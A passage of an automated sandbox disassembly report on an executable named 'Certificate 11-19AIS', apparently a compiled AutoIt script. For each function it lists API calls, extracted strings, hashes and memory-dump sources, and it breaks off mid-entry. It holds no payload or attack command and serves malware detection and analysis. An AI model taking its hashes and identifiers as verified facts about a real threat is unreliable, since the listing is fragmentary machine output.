                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                              • API String ID: 536824911-966354055
                                                                              • Opcode ID: 0d1093cd1158a11957f67f625ae3e79e00563d3cf079b87af28823505aa770ea
                                                                              • Instruction ID: b0e42336c3b6287a5ba9f33367ffbd59ee9ac7171de34c9d3de6410902ff4f0c
                                                                              • Opcode Fuzzy Hash: 0d1093cd1158a11957f67f625ae3e79e00563d3cf079b87af28823505aa770ea
                                                                              • Instruction Fuzzy Hash: 11022575204601DFCB14EF24C859A6AB7E9FF88720F05885DF99A9B3A1DB34ED41CB81
                                                                              Function 00816BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00816C56
                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00816D16
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharMessageSendUpper
                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                              • API String ID: 3974292440-719923060
                                                                              • Opcode ID: bd62034eb157f28275d8b3326fc2d3aff4bc8c32b4ef01da8d6cf0c4feee469d
                                                                              • Instruction ID: fda4f35f3ca72426e6a42c46ff1dd0f6c796b791cbf0a584a0e24ef4fb37fea0
                                                                              • Opcode Fuzzy Hash: bd62034eb157f28275d8b3326fc2d3aff4bc8c32b4ef01da8d6cf0c4feee469d
                                                                              • Instruction Fuzzy Hash: 14A19E30204245DBCB14EF20C956BAAB7A9FF44314F10496CB996DB3D2EB35EC5ACB51
                                                                              Function 007ECF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 007ECF91
                                                                              • __swprintf.LIBCMT ref: 007ED032
                                                                              • _wcscmp.LIBCMT ref: 007ED045
                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007ED09A
                                                                              • _wcscmp.LIBCMT ref: 007ED0D6
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 007ED10D
                                                                              • GetDlgCtrlID.USER32(?), ref: 007ED15F
                                                                              • GetWindowRect.USER32(?,?), ref: 007ED195
                                                                              • GetParent.USER32(?), ref: 007ED1B3
                                                                              • ScreenToClient.USER32(00000000), ref: 007ED1BA
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 007ED234
                                                                              • _wcscmp.LIBCMT ref: 007ED248
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 007ED26E
                                                                              • _wcscmp.LIBCMT ref: 007ED282
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                              • String ID: %s%u
                                                                              • API String ID: 3119225716-679674701
                                                                              • Opcode ID: 7fe2a2d5368ca62604de930d1652a8df2d30f9d3a2e424784d3cc8354970269b
                                                                              • Instruction ID: 9cf11ce0333b5d9a22a3dd5e82d302c2f34904b1ca24eb75281587478a62ee80
                                                                              • Opcode Fuzzy Hash: 7fe2a2d5368ca62604de930d1652a8df2d30f9d3a2e424784d3cc8354970269b
                                                                              • Instruction Fuzzy Hash: 06A1E371605346EFD725DF65C884FAAB7A8FF48314F008919FA69D2180EB38EE05CB91
                                                                              Function 007ED8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 007ED8EB
                                                                              • _wcscmp.LIBCMT ref: 007ED8FC
                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 007ED924
                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 007ED941
                                                                              • _wcscmp.LIBCMT ref: 007ED95F
                                                                              • _wcsstr.LIBCMT ref: 007ED970
                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 007ED9A8
                                                                              • _wcscmp.LIBCMT ref: 007ED9B8
                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 007ED9DF
                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 007EDA28
                                                                              • _wcscmp.LIBCMT ref: 007EDA38
                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 007EDA60
                                                                              • GetWindowRect.USER32(00000004,?), ref: 007EDAC9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                              • String ID: @$ThumbnailClass
                                                                              • API String ID: 1788623398-1539354611
                                                                              • Opcode ID: d0c70a4a4f11d343fb0320935bb83c771c8098b7c3aaeed1dbfd781ffe424c8d
                                                                              • Instruction ID: 32d05877b18749f14f9c46665618a2c5cdd1dc8780c9c804c338e1f4ca6deb1f
                                                                              • Opcode Fuzzy Hash: d0c70a4a4f11d343fb0320935bb83c771c8098b7c3aaeed1dbfd781ffe424c8d
                                                                              • Instruction Fuzzy Hash: 1181F8710093859FDB11DF15C885FAA7BE8FF88314F04846AFD899A096E738ED45CBA1
                                                                              Function 007ED6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                              • API String ID: 1038674560-1810252412
                                                                              • Opcode ID: c7d5d8ff8db8bfe08ef1a50e4ca061eeabf93119057a4b15f1eb0c34bd866598
                                                                              • Instruction ID: d549ce18dc7bc158dfa15b0a6cf8b33d01cd8f7e4e1f9c63cf19034bf4ee5db2
                                                                              • Opcode Fuzzy Hash: c7d5d8ff8db8bfe08ef1a50e4ca061eeabf93119057a4b15f1eb0c34bd866598
                                                                              • Instruction Fuzzy Hash: 6731CE31A44649EAEB24FB51CD57FEEB3B4EF24354F200069F451B11D1EB6DAE04C651
                                                                              Function 007EEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadIconW.USER32(00000063), ref: 007EEAB0
                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007EEAC2
                                                                              • SetWindowTextW.USER32(?,?), ref: 007EEAD9
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 007EEAEE
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 007EEAF4
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 007EEB04
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 007EEB0A
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007EEB2B
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007EEB45
                                                                              • GetWindowRect.USER32(?,?), ref: 007EEB4E
                                                                              • SetWindowTextW.USER32(?,?), ref: 007EEBB9
                                                                              • GetDesktopWindow.USER32 ref: 007EEBBF
                                                                              • GetWindowRect.USER32(00000000), ref: 007EEBC6
                                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 007EEC12
                                                                              • GetClientRect.USER32(?,?), ref: 007EEC1F
                                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 007EEC44
                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007EEC6F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                              • String ID:
                                                                              • API String ID: 3869813825-0
                                                                              • Opcode ID: a5e04eff288a8a8207cc6be0837bb531665b92c30312f91c75f0c9898e89fa04
                                                                              • Instruction ID: ee16bf4cc6d404855ce0d0df76ec3c0de107135de5b5a13d1e14665dcfd9a294
                                                                              • Opcode Fuzzy Hash: a5e04eff288a8a8207cc6be0837bb531665b92c30312f91c75f0c9898e89fa04
                                                                              • Instruction Fuzzy Hash: 56517C70900749EFDB20DFA9DD8AF6EBBF5FF48704F004928E696A25A0D774A944CB50
                                                                              Function 008079B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 008079C6
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 008079D1
                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 008079DC
                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 008079E7
                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 008079F2
                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 008079FD
                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00807A08
                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00807A13
                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00807A1E
                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00807A29
                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00807A34
                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00807A3F
                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00807A4A
                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00807A55
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00807A60
                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00807A6B
                                                                              • GetCursorInfo.USER32(?), ref: 00807A7B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$Load$Info
                                                                              • String ID:
                                                                              • API String ID: 2577412497-0
                                                                              • Opcode ID: b6704ccb7b1a705e2721a5d26396a93cd3eb4c93f90fe72858c3a87d7a7e57ed
                                                                              • Instruction ID: cbb89490df445d615d2f6e71c0140aedfc1cc7722ed09e912251b32ef1b3f588
                                                                              • Opcode Fuzzy Hash: b6704ccb7b1a705e2721a5d26396a93cd3eb4c93f90fe72858c3a87d7a7e57ed
                                                                              • Instruction Fuzzy Hash: DE3129B0E083196ADB509FB68C8995FBFE8FF04750F50453AE50DE7181DB78A5008FA1
                                                                              Function 007BC833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,007BC8B7,?,00002000,?,?,00000000,?,007B419E,?,?,?,0084DC00), ref: 007CE984
                                                                                • Part of subcall function 007B660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B53B1,?,?,007B61FF,?,00000000,00000001,00000000), ref: 007B662F
                                                                              • __wsplitpath.LIBCMT ref: 007BC93E
                                                                                • Part of subcall function 007D1DFC: __wsplitpath_helper.LIBCMT ref: 007D1E3C
                                                                              • _wcscpy.LIBCMT ref: 007BC953
                                                                              • _wcscat.LIBCMT ref: 007BC968
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 007BC978
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 007BCABE
                                                                                • Part of subcall function 007BB337: _wcscpy.LIBCMT ref: 007BB36F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                              • API String ID: 2258743419-1018226102
                                                                              • Opcode ID: 60de1cb71b8544719651b27d29da3d255a42588fb02a0beb535b5942515807b8
                                                                              • Instruction ID: 0ac8d0f9d171cbf7b4cbcb4f588f55a67d977d3436c2b0054137543e64c2e28e
                                                                              • Opcode Fuzzy Hash: 60de1cb71b8544719651b27d29da3d255a42588fb02a0beb535b5942515807b8
                                                                              • Instruction Fuzzy Hash: A4126771508341DBC725EF24D895AAFBBE5FF98304F00491EF58993262DB38DA89CB52
                                                                              Function 0081CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0081CEFB
                                                                              • DestroyWindow.USER32(?,?), ref: 0081CF73
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0081CFF4
                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0081D016
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0081D025
                                                                              • DestroyWindow.USER32(?), ref: 0081D042
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,007B0000,00000000), ref: 0081D075
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0081D094
                                                                              • GetDesktopWindow.USER32 ref: 0081D0A9
                                                                              • GetWindowRect.USER32(00000000), ref: 0081D0B0
                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0081D0C2
                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0081D0DA
                                                                                • Part of subcall function 007CB526: GetWindowLongW.USER32(?,000000EB), ref: 007CB537
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                              • String ID: 0$tooltips_class32
                                                                              • API String ID: 3877571568-3619404913
                                                                              • Opcode ID: c0ee68948a838b00b1e6310ae0c7baf9a89fee0ae7a931a1798133334cbe9f4a
                                                                              • Instruction ID: c7b382d68ef1bea6a7574692583799d352deb2e1beafb9706b04ed164a1a40ea
                                                                              • Opcode Fuzzy Hash: c0ee68948a838b00b1e6310ae0c7baf9a89fee0ae7a931a1798133334cbe9f4a
                                                                              • Instruction Fuzzy Hash: 567168B1150705AFDB20CF28CC89FA677A9FB98704F084619F995C72A1D774E982CB62
                                                                              Function 0081F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                                              • DragQueryPoint.SHELL32(?,?), ref: 0081F37A
                                                                                • Part of subcall function 0081D7DE: ClientToScreen.USER32(?,?), ref: 0081D807
                                                                                • Part of subcall function 0081D7DE: GetWindowRect.USER32(?,?), ref: 0081D87D
                                                                                • Part of subcall function 0081D7DE: PtInRect.USER32(?,?,0081ED5A), ref: 0081D88D
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0081F3E3
                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0081F3EE
                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0081F411
                                                                              • _wcscat.LIBCMT ref: 0081F441
                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0081F458
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0081F471
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0081F488
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0081F4AA
                                                                              • DragFinish.SHELL32(?), ref: 0081F4B1
                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0081F59C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                              • API String ID: 169749273-3440237614
                                                                              • Opcode ID: 79924bcd3894c14ea1026f52fbd55e55b3dd23282f9c221d8ee5112c5c6b870b
                                                                              • Instruction ID: a56ef42aa67692cf0cb41d3176eaa17f73186d3e9da484add33a07592ad1a369
                                                                              • Opcode Fuzzy Hash: 79924bcd3894c14ea1026f52fbd55e55b3dd23282f9c221d8ee5112c5c6b870b
                                                                              • Instruction Fuzzy Hash: 0F613A71108300AFC711EF64DC4AE9FBBE8FF98714F004A1DB695961A1DB74DA49CB52
                                                                              Function 007FAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(00000000), ref: 007FAB3D
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 007FAB46
                                                                              • VariantClear.OLEAUT32(?), ref: 007FAB52
                                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007FAC40
                                                                              • __swprintf.LIBCMT ref: 007FAC70
                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 007FAC9C
                                                                              • VariantInit.OLEAUT32(?), ref: 007FAD4D
                                                                              • SysFreeString.OLEAUT32(00000016), ref: 007FADDF
                                                                              • VariantClear.OLEAUT32(?), ref: 007FAE35
                                                                              • VariantClear.OLEAUT32(?), ref: 007FAE44
                                                                              • VariantInit.OLEAUT32(00000000), ref: 007FAE80
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                              • API String ID: 3730832054-3931177956
                                                                              • Opcode ID: 48a4f5a5374e48759b1608e53f6aff639b530eae0f557435552656b375e4266c
                                                                              • Instruction ID: e9159ad33d2ad71665ce99ca0508f50b2efbcec18e5296473457d0ca1e99336c
                                                                              • Opcode Fuzzy Hash: 48a4f5a5374e48759b1608e53f6aff639b530eae0f557435552656b375e4266c
                                                                              • Instruction Fuzzy Hash: 45D1BFF1604209EBCB249F65D889BB9B7B5FF04700F148499E6199B381DB7CED40DBA2
                                                                              Function 0081716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?), ref: 008171FC
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00817247
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharMessageSendUpper
                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                              • API String ID: 3974292440-4258414348
                                                                              • Opcode ID: 943765aa586bc34628defe5328170579512c04a1c29b6bfeeb68e6ae232ee6df
                                                                              • Instruction ID: 10fb5f7682410fdf3a2e06af150c52e050647751a0c0b89da65292f01a80153e
                                                                              • Opcode Fuzzy Hash: 943765aa586bc34628defe5328170579512c04a1c29b6bfeeb68e6ae232ee6df
                                                                              • Instruction Fuzzy Hash: D5917C74208601DBCB15EF20C845AAEB7A5FF94304F05485CF9969B3A3DB38ED4ACB91
                                                                              Function 0081E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0081E5AB
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0081BEAF), ref: 0081E607
                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0081E647
                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0081E68C
                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0081E6C3
                                                                              • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0081BEAF), ref: 0081E6CF
                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0081E6DF
                                                                              • DestroyIcon.USER32(?,?,?,?,?,0081BEAF), ref: 0081E6EE
                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0081E70B
                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0081E717
                                                                                • Part of subcall function 007D0FA7: __wcsicmp_l.LIBCMT ref: 007D1030
                                                                              Strings
                                                                              Memory Dump Source
